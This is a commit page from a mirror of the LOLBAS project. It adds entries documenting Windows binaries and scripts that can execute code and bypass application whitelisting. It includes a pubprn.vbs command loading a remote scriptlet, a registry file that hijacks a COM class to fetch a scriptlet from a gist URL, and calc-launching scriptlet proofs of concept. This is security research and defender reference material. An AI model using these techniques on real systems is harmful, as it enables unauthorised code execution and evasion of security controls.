infosecn1nja
/
LOLBAS
mirror of https://github.com/infosecn1nja/LOLBAS.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added more in new structure

master
api0cradle 2018-04-18 16:59:53 +02:00
parent e4b37b00ef
commit 0eb4ec64e3
10 changed files with 202 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
Contribute.md Normal file
View File

@ -0,0 +1,29 @@
Template
## Binary.exe
* Functions: Execute
```
Example
```
Acknowledgements:
* Name of guy - @twitterhandle
Code sample:
* [NameOfLink](Payload/NameOfPayload)
Resources:
* https://linktosomethingusefull.com
Full path:
```
c:\windows\system32\binary.exe
```
Notes:
Some specific details about the binary file.

1
LOLBins.md
View File

@ -15,6 +15,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
[Installutil.exe](OSBinaries/Installutil.md) [Installutil.exe](OSBinaries/Installutil.md)
[Mavinject32.exe](OSBinaries/Mavinject32.md) [Mavinject32.exe](OSBinaries/Mavinject32.md)
[Msbuild.exe](OSBinaries/Msbuild.md) [Msbuild.exe](OSBinaries/Msbuild.md)
[Msdt.exe](OSBinaries/Msdt.md)
[Mshta.exe](OSBinaries/Mshta.md) [Mshta.exe](OSBinaries/Mshta.md)
[Msiexec.exe](OSBinaries/Msiexec.md) [Msiexec.exe](OSBinaries/Msiexec.md)
[Odbcconf.exe](OSBinaries/Odbcconf.md) [Odbcconf.exe](OSBinaries/Odbcconf.md)

1
LOLScripts.md
View File

@ -5,3 +5,4 @@ If you are missing from the acknowledgement, please let me know (I did not forge
# OS SCRIPTS # OS SCRIPTS
[Cl_invocation](OSScripts/Cl_invocation.md)

15
OSBinaries/Msdt.md Normal file
View File

@ -0,0 +1,15 @@
## Msdt.exe
* Functions: Execute
```
Open .diagcab package
```
Acknowledgements:
* ?
Resources:
* https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/

29
OSScripts/Cl_invocation.md Normal file
View File

@ -0,0 +1,29 @@
## CL_Invocation.ps1
* Functions: Execute
```
. C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
SyncInvoke <executable> [args]
```
Acknowledgements:
* Jimmy - @bohops
Code sample:
Resources:
* https://twitter.com/bohops/status/948548812561436672
Full path:
```
C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
```
Notes:

29
OSScripts/Pubprn.md Normal file
View File

@ -0,0 +1,29 @@
## Pubprn.vbs
* Functions: Execute
```
pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct
```
Acknowledgements:
* Matt Nelson - @enigma0x3
Code sample:
* [Pubprn_calc.sct](Payload/Pubprn_calc.sct)
Resources:
* https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
* https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
Full path:
```
C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
```
Notes:

30
OSScripts/Slmgr.md Normal file
View File

@ -0,0 +1,30 @@
## Slmgr.vbs
* Functions: Execute
```
slmgr.vbs
```
Acknowledgements:
* Matt Nelson - @enigma0x3
* Casey Smith - @subtee
Code sample:
* [NameOfLink](Payload/NameOfPayload)
Resources:
* https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
* https://www.youtube.com/watch?v=3gz1QmiMhss
Full path:
```
c:\windows\system32\slmgr.vbs
c:\windows\sysWOW64\slmgr.vbs
```
Notes:
Requires registry keys to work.

22
Payload/Pubprn_calc.sct Normal file
View File

@ -0,0 +1,22 @@
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
</registration>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>

24
Payload/Slmgr.reg Normal file
View File

@ -0,0 +1,24 @@
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary]
@=""
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
@="Scripting.Dictionary"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
@="C:\\WINDOWS\\system32\\scrobj.dll"
"ThreadingModel"="Apartment"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
@="Scripting.Dictionary"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
@="https://gist.githubusercontent.com/enigma0x3/4373e9a63aaebe177c747af9bc6da743/raw/2207d8a1a536371aff5f61c8bef8400622868976/wee.png"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
@="Scripting.Dictionary"

22
Payload/Slmgr_calc.sct Normal file
View File

@ -0,0 +1,22 @@
<?XML version="1.0"?>
<scriptlet>
<registration
description="Scripting.Dictionary"
progid="Scripting.Dictionary"
version="1"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
</registration>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>